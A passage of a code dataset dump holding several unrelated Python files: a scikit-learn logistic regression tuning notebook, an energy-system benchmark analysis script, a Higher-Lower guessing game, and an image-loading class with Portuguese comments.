recall_score\nrecall_score(y_test, vals, average = 'macro', zero_division = 1)\n\n\n# In[33]:\n\n\nfrom sklearn.metrics import precision_score\nprecision_score(y_test, vals, average = 'macro')\n\n\n# In[35]:\n\n\nfrom sklearn.model_selection import RandomizedSearchCV\nparams = {\n 'penalty':['none','l2','l1','elasticnet'],\n 'dual':[True, False],\n 'tol':[1e-4, 1e-5,1e-6,1e-2],\n 'C':[0.1,0.2,0.3,0.4,0.5,0.6,0.7,0.8,0.9,1,1.1,1.2,1.3,1.4,1.5,1.6,1.7,1.8,1.9,2],\n 'max_iter':[100,150,200,50]\n}\nfrom sklearn.linear_model import LogisticRegression\nlogsolver = LogisticRegression(n_jobs=-1)\nmodel = RandomizedSearchCV(logsolver, params, cv = 5, n_iter = 12)\nmodel.fit(fofdata['data'], fofdata['target'])\n\n\n# In[37]:\n\n\nmodel.cv_results_\nmodel.best_estimator_\n\n\n# In[40]:\n\n\n# dfresult = pd.DataFrame(model.cv_results_)\n# dfresult\nmodel.best_score_ #This best score drew the original model from 96.25% to 96.5%\n\n\n# In[41]:\n\n\n#Now that we have these parameters, lets see if we can improve the score even more by gridsearching over the different solvers\nintermediatesolver = LogisticRegression(C=1.1, n_jobs = -1, tol = 1e-05)\nparameters = {\n 'solver':['newton-cg', 'sag','saga','lbgfs']\n}\nfrom sklearn.model_selection import GridSearchCV\ntesting = GridSearchCV(intermediatesolver, parameters, cv = 5)\ntesting.fit(fofdata['data'], fofdata['target'])\ntestdf = pd.DataFrame(testing.cv_results_)\n\n\n# In[42]:\n\n\ntestdf\n\n\n# In[43]:\n\n\n#We were able to get the best overall performance with newtoncg added onto our original best model for a 97.25% test score\n#So overall we were able to improve performance by a whopping 1.25%. \n#We found best parameters were newton cg as solver, n_jobs = -1, C= 1.1 tol = 1e-05 with 20% test split\n\n\n# In[ ]:\n\n\n\n\n","repo_name":"KenNavarro730/ClassicalMLWork","sub_path":"LogisticRegression.py","file_name":"LogisticRegression.py","file_ext":"py","file_size_in_byte":2533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"27934506088","text":"'''\nAnalysis script for the benchmark results, comparing\nresults with voltage control enabled and disabled.\n'''\nimport json\nimport os\n\nimport sys\nfrom loguru import logger\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom pandas import DataFrame\n\nimport benchmark_2_example.benchmark_multi_energy_sim as benchmark_sim\nimport toolbox_analysis\n\nlogger.remove()\nlogger.add(\"results.log\", level=\"DEBUG\")\nlogger.add(sys.stderr, level=\"DEBUG\")\n\nSTART_TIME = '2019-02-01 00:00:00'\n\nPLOT_DICT = {\n 'tank temperatures': [\n 'temperature in °C',\n [\n 'StratifiedWaterStorageTank_0.T_cold',\n 'StratifiedWaterStorageTank_0.T_hot',\n 'StratifiedWaterStorageTank_0.T_avg',\n # 'StratifiedWaterStorageTank_0.T_ch_in',\n # 'StratifiedWaterStorageTank_0.T_dis_in',\n ]\n ],\n 'tank mass flow': [\n 'mass flow in kg/m^3',\n [\n 'StratifiedWaterStorageTank_0.mdot_ch_in',\n 'StratifiedWaterStorageTank_0.mdot_dis_in',\n 'StratifiedWaterStorageTank_0.mdot_ch_out',\n 'StratifiedWaterStorageTank_0.mdot_dis_out',\n ]\n ],\n 'heatpump': [\n 'power in kW',\n [\n 'heatpump_0.P_effective',\n 'heatpump_0.P_requested',\n ]\n ],\n 'flex heat controller state': [\n 'state',\n [\n 'FHctrl_0.state',\n ]\n ],\n 'flex heat controller HP mdot out': [\n 'HP mdot out',\n [\n 'FHctrl_0.mdot_HP_out',\n ]\n ],\n 'voltage controller': [\n 'setpoint in kW',\n [\n 'VoltageController_0.hp_p_el_kw_setpoint',\n ]\n ],\n 'electrical consumption': [\n 'electrical 
consumption in MW',\n [\n 'Load_1_0.p_mw',\n 'Load_2_0.p_mw',\n 'Heat Pump_0.p_mw',\n ]\n ],\n 'PV generation': [\n 'PV generation in MW',\n [\n 'PV_1_0.p_mw',\n 'PV_2_0.p_mw',\n ]\n ],\n 'voltage levels': [\n 'voltage levels in p.u.',\n [\n 'Bus_1_0.vm_pu',\n 'Bus_2_0.vm_pu',\n ]\n ],\n 'line loadings': [\n 'line loading in %',\n [\n 'LV_Line_0-1_0.loading_percent',\n 'LV_Line_1-2_0.loading_percent',\n ]\n ],\n 'line losses': [\n 'line losses in mw',\n [\n 'LV_Line_0-1_0.pl_mw',\n 'LV_Line_1-2_0.pl_mw',\n ]\n ],\n 'line losses': [\n 'line losses in mvar',\n [\n 'LV_Line_1-2_0.ql_mvar',\n 'LV_Line_0-1_0.ql_mvar',\n ]\n ],\n 'DHNetwork': [\n 'mass flow (mdot)',\n [\n 'DHNetwork_0.mdot_cons1_set',\n 'DHNetwork_0.mdot_cons2_set',\n 'DHNetwork_0.mdot_grid_set',\n 'DHNetwork_0.mdot_tank_in_set',\n 'DHNetwork_0.mdot_cons1',\n 'DHNetwork_0.mdot_cons2',\n 'DHNetwork_0.mdot_grid',\n 'DHNetwork_0.mdot_tank_in',\n ]\n ],\n}\n\nFIG_TYPE = 'png' # 'pdf'\nFIG_SIZE = [15, 8]\n\n\ndef data_processing(recipe, variations, folder_temp_files, summary_filename, drop_first_day_data=True):\n # # Data processing\n sim_results = {}\n results_store = pd.HDFStore(benchmark_sim.get_store_filename(recipe))\n # ToDo: Does the ME benchmark have a specific start time?\n start_time = '2019-02-01 00:00:00'\n\n for collector in results_store:\n for (simulator, attribute), data in results_store[collector].items():\n # Retrieve short name of data.\n sim_node_name = get_sim_node_name(simulator)\n res_name = '.'.join([sim_node_name, attribute])\n\n # Convert index to time format.\n data.index = pd.to_datetime(data.index, unit='s', origin=start_time)\n\n if drop_first_day_data:\n first_day_data = data.first('1D')\n sim_results[res_name] = data.drop(first_day_data.index)\n else:\n sim_results[res_name] = data\n results_store.close()\n\n # Power Grid\n if recipe['stochastic']:\n grid_voltage_bus_1_vm_pu = sim_results['ng__0.output']\n else:\n grid_voltage_bus_1_vm_pu = sim_results['Bus_1_0.vm_pu']\n grid_voltage_bus_1_max_pu = grid_voltage_bus_1_vm_pu.max()\n grid_voltage_bus_1_min_pu = grid_voltage_bus_1_vm_pu.min()\n\n grid_voltage_bus_2_vm_pu = sim_results['Bus_2_0.vm_pu']\n grid_voltage_bus_2_max = grid_voltage_bus_2_vm_pu.max()\n grid_voltage_bus_2_min = grid_voltage_bus_2_vm_pu.min()\n\n line_0_loading = sim_results['LV_Line_0-1_0.loading_percent']\n line_0_loading_max = line_0_loading.max()\n line_1_loading = sim_results['LV_Line_1-2_0.loading_percent']\n line_1_loading_max = line_1_loading.max()\n\n line_0_losses_pl_mw = sim_results['LV_Line_0-1_0.pl_mw']\n line_1_losses_pl_mw = sim_results['LV_Line_1-2_0.pl_mw']\n line_losses_pl_mw = line_0_losses_pl_mw + line_1_losses_pl_mw\n # line_reactive_consumption_mvar = sim_results['LV_Line_0-1_0.ql_mvar'].sum() + \\\n # sim_results['LV_Line_1-2_0.ql_mvar'].sum()\n\n\n # use Heat Pump consumption for evaluation!\n hp_p_effective = sim_results['heatpump_0.P_effective']\n # ToDo: rename variable!\n hp_w_effective = sim_results['heatpump_0.Qdot_cond']\n hp_average_COP = hp_w_effective.sum() / hp_p_effective.sum()\n\n # hp_T_cond_out = sim_results['heatpump_0.T_cond_out']\n # hp_T_evap_out = sim_results['heatpump_0.T_evap_out']\n\n pv_generation_p_mw = sim_results['PV_1_0.p_mw'] + sim_results['PV_2_0.p_mw']\n el_consumption_p_mw = sim_results['Heat Pump_0.p_mw'] + sim_results['Load_1_0.p_mw'] + sim_results['Load_2_0.p_mw']\n electricity_balance_mw = pv_generation_p_mw - el_consumption_p_mw - line_losses_pl_mw\n electricity_export_time_series_mw = 
electricity_balance_mw.where(electricity_balance_mw > 0, 0)\n electricity_export_mwh = electricity_export_time_series_mw.sum() / 60 # - line_losses\n electricity_import_time_series_mw = -electricity_balance_mw.where(electricity_balance_mw < 0, 0)\n electricity_import_mwh = electricity_import_time_series_mw.sum() / 60\n self_consumption_mwh = (pv_generation_p_mw - electricity_export_time_series_mw).sum() / 60\n self_consumption_perc = (self_consumption_mwh / (pv_generation_p_mw.sum() / 60)) * 100\n #ToDo: look at summer school example again\n # self_consumption_index = ((pv_generation_p_mw + el_consumption_p_mw) / pv_generation_p_mw).sum()\n\n # evaluate the percentage of thermal energy provided by the tank\n # https://adgefficiency.com/energy-basics-q-m-cp-dt/\n cp_water = 4.18 # mass heat capacity\n mdot_grid_kg_s = sim_results['FHctrl_0.mdot_grid_set'] # Mass flow injected by the grid\n temp_ext_grid_supply = sim_results['DHNetwork_0.T_supply_grid'] # Supply temperature from the external grid\n temp_ext_grid_return = sim_results['DHNetwork_0.T_return_grid'] # Return temperature to the external grid\n energy_ext_grid_kw_min = mdot_grid_kg_s / 60 * cp_water * (temp_ext_grid_supply - temp_ext_grid_return)\n\n # temp_hwt = sim_results['StratifiedWaterStorageTank_0.T_hot']\n hp_mdot_cond_out_kg_s = sim_results['heatpump_0.mdot_cond_out']\n hp_T_cond_out = sim_results['heatpump_0.T_cond_out']\n hwt_temp_cold = sim_results['StratifiedWaterStorageTank_0.T_cold']\n energy_tank_charged_kw_min = hp_mdot_cond_out_kg_s / 60 * cp_water * (hp_T_cond_out - hwt_temp_cold)\n\n hwt_temp_hot = sim_results['StratifiedWaterStorageTank_0.T_hot']\n hwt_temp_return = sim_results['DHNetwork_0.T_return_tank'] # Temperature of water returning from dh network to hwt\n mdot_tank_in_kg_s = sim_results['StratifiedWaterStorageTank_0.mdot_dis_in'] # Mass flow from the tank to dh network\n energy_tank_supplied_kw_min = mdot_tank_in_kg_s / 60 * cp_water * (hwt_temp_hot - hwt_temp_return)\n\n sum_energy_kw_min = energy_ext_grid_kw_min + energy_tank_charged_kw_min\n #heat_internal_percentage = 100 * energy_tank.sum() / (energy_ext_grid.sum() + energy_tank.sum())\n\n # evaluate the critical node temperature\n t_supply_1 = sim_results['DHNetwork_0.T_supply_cons1']\n t_supply_2 = sim_results['DHNetwork_0.T_supply_cons2']\n\n # Look at setpoint of the voltage controller for the heat pump to evaluate the curtailment\n hp_p_rated = sim_results['heatpump_0.P_rated'].max()\n hp_p_el_kw_setpoint = sim_results['VoltageController_0.hp_p_el_kw_setpoint']\n hp_p_el_kw_setpoint_percentage = hp_p_el_kw_setpoint / hp_p_rated * 100\n hp_p_el_kw_setpoint_percentage_mean = hp_p_el_kw_setpoint_percentage.mean()\n\n sim_data = {'ID': [recipe['ID']],\n #'grid_voltage_bus_1_max_pu': [grid_voltage_bus_1_max_pu],\n 'grid_voltage_bus_2_max_pu': [grid_voltage_bus_2_max],\n 'line_0_loading_max_perc': [line_0_loading_max],\n #'line_1_loading_max_perc': [line_1_loading_max],\n 'hp_electr_energy_gwh': [hp_p_effective.sum() / 60 / 1000],\n 'hp_heat_energy_gwh': [hp_w_effective.sum() / 60 / 1000],\n 'hp_average_COP': [hp_average_COP],\n 'electricity_import_mwh': [electricity_import_mwh],\n 'electricity_export_mwh': [electricity_export_mwh],\n #'self_consumption_mwh': [self_consumption_mwh],\n 'self_consumption_perc': [self_consumption_perc],\n #'line_losses_mwh': [line_losses_pl_mw.sum() / 60],\n #'hp_p_el_kw_setpoint_perc_mean': [hp_p_el_kw_setpoint_percentage_mean],\n 't_supply_min': [min([t_supply_1.min(), t_supply_2.min()])],\n 't_supply_max': 
[max([t_supply_1.max(), t_supply_2.max()])],\n #'energy_sum_gwh': [sum_energy_kw_min.sum() / 60 / 1000],\n 'heat_import_gwh': [energy_ext_grid_kw_min.sum() / 60 / 1000],\n 'heat_import_perc': [energy_ext_grid_kw_min.sum() / sum_energy_kw_min.sum() / 60 / 1000],\n 'hp_perc': [hp_w_effective.sum() / sum_energy_kw_min.sum() / 60 / 1000],\n #'grid_voltage_bus_1_min_pu': [grid_voltage_bus_1_min_pu],\n #'grid_voltage_bus_2_min_pu': [grid_voltage_bus_2_min],\n #'electricity_balance_mwh': [electricity_balance_mw.sum() / 60],\n #'line_reactive_consumption_mvar': [line_reactive_consumption_mvar],\n #'energy_tank_charged_kw_min_gwh': [energy_tank_charged_kw_min.sum() / 60 / 1000],\n #'energy_tank_supplied_kw_min_gwh': [energy_tank_supplied_kw_min.sum() / 60 / 1000],\n #'heat_internal_percentage': [heat_internal_percentage],\n #'self_consumption_index': [self_consumption_index],\n 'File ID/dataframe': [\n '{}'.format(benchmark_sim.get_store_filename(recipe)) + '/' + 'timeseries/sim_{}'.format(recipe['ID'])]}\n\n # Write variation parameter to sim_data dict (needed for meta model analysis)\n for key in recipe.keys():\n if key in list(variations.values())[0].keys():\n if isinstance(recipe[key], dict):\n for key2, value in recipe[key].items():\n sim_data[f\"{key}.{key2}\"] = value\n # print(f\"sim_data: {sim_data}\")\n sim_data_df = pd.DataFrame(sim_data)\n sim_data_df.to_csv(f\"{folder_temp_files}/{summary_filename}.csv\")\n run_store = pd.HDFStore(f\"{folder_temp_files}/{summary_filename}.h5\")\n run_store['run_{}'.format(recipe['ID'])] = sim_data_df\n run_store.close()\n\n\ndef get_sim_node_name(\n full_name\n):\n (sim_name, sim_node) = full_name.split('.')\n return sim_node\n\n\ndef retrieve_results(\n store_name,\n start_time,\n drop_first_day_data = True\n):\n results_dict = {}\n results_store = pd.HDFStore(store_name)\n\n for collector in results_store:\n for (simulator, attribute), data in results_store[collector].items():\n # Retrieve short name of data.\n sim_node_name = get_sim_node_name(simulator)\n res_name = '.'.join([sim_node_name, attribute])\n\n # Convert index to time format.\n data.index = pd.to_datetime(data.index, unit='s', origin=start_time)\n\n if drop_first_day_data:\n first_day_data = data.first('1D')\n results_dict[res_name] = data.drop(first_day_data.index)\n else:\n results_dict[res_name] = data\n\n results_store.close()\n return results_dict\n\n\ndef plot_results_compare(\n entity, attr, label, folder_figures,\n recipes,\n dict_results_list,\n fig_id, show=False, fig_type='png'\n):\n fig, axes_attr_compare = plt.subplots(figsize=FIG_SIZE)\n for i in range(len(dict_results_list)):\n attr_i = dict_results_list[i][f\"{entity}.{attr}\"]\n axes_attr_compare.plot(attr_i, label='{} {}'.format(entity, list(recipes.values())[i]['ID']))\n axes_attr_compare.legend(loc='upper right')\n axes_attr_compare.set_xlabel('date')\n axes_attr_compare.set_ylabel(label)\n\n plt.savefig('{}/fig_{}_{}_{}.{}'.format(folder_figures, fig_id, entity, attr, fig_type))\n if show:\n plt.show()\n plt.close()\n\n # fig, axes_sorted_attr_compare = plt.subplots(figsize=FIG_SIZE)\n # #df_sorted_attr_compare = pd.DataFrame()\n # for i in range(len(dict_results_list)):\n # attr_i = dict_results_list[i][f\"{entity}.{attr}\"]\n # sorted_attr_i = attr_i.sort_values(ascending=False, ignore_index=True)\n # axes_sorted_attr_compare.plot(sorted_attr_i, label='{} {}'.format(entity, list(recipes.values())[i]['ID']))\n # #df_sorted_attr_compare['{} {}'.format(entity, list(recipes.values())[i]['ID'])] = sorted_attr_i\n # 
axes_sorted_attr_compare.legend(loc='upper right')\n # axes_sorted_attr_compare.set_ylabel(label)\n # axes_sorted_attr_compare.set_title('duration plot of {}'.format(attr))\n # plt.savefig('{}/fig_sorted_{}_{}.{}'.format(FOLDER, fig_id, attr, fig_type))\n # if show:\n # plt.show()\n # plt.close()\n\n #axes_sorted_attr_compare_hist = df_sorted_attr_compare.plot.hist(bins=bins, alpha=0.5, figsize=FIG_SIZE)\n #axes_sorted_attr_compare_hist.legend(loc='upper right')\n #axes_sorted_attr_compare_hist.set_xlabel(label)\n #plt.savefig('{}/fig_hist_{}.{}'.format(FOLDER, fig_id, fig_type))\n #if show:\n # plt.show()\n #plt.close()\n\n #return (attr_type1.sum(), attr_type2.sum())\n\n\ndef plot_simulation_results(sim_parameters):\n basic_conf = sim_parameters['basic_conf']\n\n dict_results_list = []\n for filename in os.scandir(basic_conf['folder_temp_files']):\n if filename.is_file():\n if sim_parameters['summary_filename'] not in str(filename):\n if 'recipes.json' not in str(filename):\n logger.info(filename)\n dict_results_list.append(retrieve_results(filename,\n START_TIME,\n sim_parameters['drop_first_day_data']))\n\n #Read in recipes from json file\n with open(f\"{basic_conf['folder_temp_files']}/recipes.json\", \"r\") as json_file:\n recipes = json.load(json_file)\n\n for label in PLOT_DICT:\n x_label = PLOT_DICT[label][0]\n for attr in PLOT_DICT[label][1]:\n entity = attr.split('.')[0]\n attr_name = attr.split('.')[1]\n plot_results_compare(\n entity, attr_name, x_label, sim_parameters['folder_figures'],\n recipes,\n dict_results_list,\n label, sim_parameters['show_plots'], FIG_TYPE\n )\n\n\nif __name__ == '__main__':\n # sim_parameters = toolbox_analysis.read_in_sim_parameters(r'resources\\simulation_parameters.json')\n # sim_parameters = toolbox_analysis.read_in_sim_parameters(r'resources\\simulation_parameters.json')\n sim_parameters = toolbox_analysis.read_in_sim_parameters(r'resources\\simulation_parameters_inter_domain.json')\n # plot_simulation_results(sim_parameters)\n\n with open(f\"{sim_parameters['basic_conf']['folder_temp_files']}/recipes.json\", \"r\") as read_file:\n recipes = json.loads(read_file)\n with open(f\"{sim_parameters['basic_conf']['folder_temp_files']}/variations.json\", \"r\") as read_file:\n variations = json.loads(read_file)\n\n for recipe_name in recipes:\n logger.info(f'Data processing scenario with recipe {recipe_name}: {recipes[recipe_name]}')\n data_processing(recipes[recipe_name],\n variations,\n sim_parameters['basic_conf']['folder_temp_files'],\n sim_parameters['summary_filename'],\n sim_parameters['drop_first_day_data'])","repo_name":"ERIGrid2/toolbox_doe_sa","sub_path":"benchmark_2_example/benchmark_multi_energy_analysis.py","file_name":"benchmark_multi_energy_analysis.py","file_ext":"py","file_size_in_byte":16667,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"14113242983","text":"# Higher Lower game is a comparison between 2 different instagram accounts about which one has higher followers\n# There are 2 choices provided: A and B (both randomly chosen from a list) and the player has to guess which account has more followers A or B\n# If the player chooses correctly then B becomes A for the next round and B is choosen randomly from the list again and the score increases by 1\n# If the player chooses incorrectly then game ends and the final score is displayed\n\n# List of accounts is defined as followed\n# each item is a dictianry with the following keys:\n# name\n# follower_count\n# 
description\n# country\n\nimport os\nimport random\nfrom game_data import data\nfrom art import logo, vs\n\ndef print_gameplay(A, B):\n \"\"\"Formats and prints gameplay message between A and B\"\"\"\n print(f\"Compare A: {A['name']}, a {A['description']}, from {A['country']}.\")\n print(vs)\n print(f\"Against B: {B['name']}, a {B['description']}, from {B['country']}.\")\n\n\ndef compare_followers(A, B):\n \"\"\"Asks user for input and compares whether A or B has more followers and returns True if user chooses correctly\"\"\"\n user_input = input(\"Who has more followers? Type 'A' or 'B': \")\n if user_input == 'A' and A[\"follower_count\"] >= B[\"follower_count\"]:\n return True\n elif user_input == 'B' and B[\"follower_count\"] >= A[\"follower_count\"]:\n return True\n else:\n return False\n\n\ndef gameplay():\n \"\"\"Main function that controls other functions\"\"\"\n continue_game = True\n score = 0\n #randomly choose 2 items from list as A and B\n A = random.choice(data)\n B = random.choice(data)\n if A == B:\n B = random.choice(data)\n print(logo)\n print_gameplay(A, B)\n continue_game = compare_followers(A, B)\n\n while continue_game:\n os.system('cls' if os.name == 'nt' else 'clear')\n print(logo)\n if continue_game:\n A = B\n B = random.choice(data)\n if A == B:\n B = random.choice(data)\n score += 1\n print(f\"You are right! Current Score: {score}\")\n else:\n break\n print_gameplay(A, B)\n continue_game = compare_followers(A, B)\n \n print(f\"Sorry that is wrong. Final Score: {score}\")\n\n\ngameplay()","repo_name":"souvik119/Python100DaysOfCode","sub_path":"Day11-20/Day14/higher_lower.py","file_name":"higher_lower.py","file_ext":"py","file_size_in_byte":2267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"5466020091","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Sep 10 22:12:57 2017\n\n@author: willian\n\"\"\"\n\n\nimport sys\nimport ConfVars\nimport mahotas as mh\nfrom os import path\nimport numpy as np\nimport logging\nfrom matplotlib import pyplot as plt\n\n\n'''\nImagem\n'''\nclass Imagem():\n \n def __init__(self, arquivo, rgb=True):\n self.formato = self.getFormato(arquivo)\n self.arquivo = arquivo\n self.rgb = rgb\n \n if not path.isfile(arquivo):\n sys.exit(\"Erro ao carregar a imagem\")\n \n self.load(arquivo)\n self.tamanho = self.dados.shape\n self.rotulo = ConfVars.ROTULOS_CLASSES[self.getClasse()[0]]\n self.idxpatches = []\n \n # Carrega o arquivo da imagem \n def load(self, arquivo, rgb=True): \n if rgb:\n self.dados = mh.imread(arquivo)\n else:\n self.dados = mh.imread(arquivo, as_grey=True)\n self.dados = self.dados.astype(np.uint8)\n \n # Retorna uma imagem rgb em escala de cinza\n def getCinza(self):\n return(mh.colors.rgb2grey(self.dados))\n \n # Retorna o formato da imagem (extensao do arquivo) \n def getFormato(self, arquivo):\n return (path.basename(arquivo.upper()).split('.')[-1])\n \n # Retorna a classe a subclasse da imagem \n def getClasse(self):\n info_arquivo = str(self.arquivo[self.arquivo.rfind(\"/\")+1:]).split('_') \n \n if info_arquivo:\n classe = info_arquivo[1] \n subclasse = info_arquivo[2].split('-')[0]\n else:\n logging.info(\"Problema ao recuperar o rotulo/classe da imagem.\")\n \n return (classe,subclasse)\n \n # Exibe a imagem passada\n def show(self): \n try:\n plt.imshow(self.dados)\n plt.show()\n plt.clf()\n except Exception as e:\n logging.info(\"Erro ao exibir a imagem 
{0}\".format(str(e)))","repo_name":"awillsousa/PatchClassifiers","sub_path":"tensorpatch/patch_scripts/Imagem.py","file_name":"Imagem.py","file_ext":"py","file_size_in_byte":1972,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"}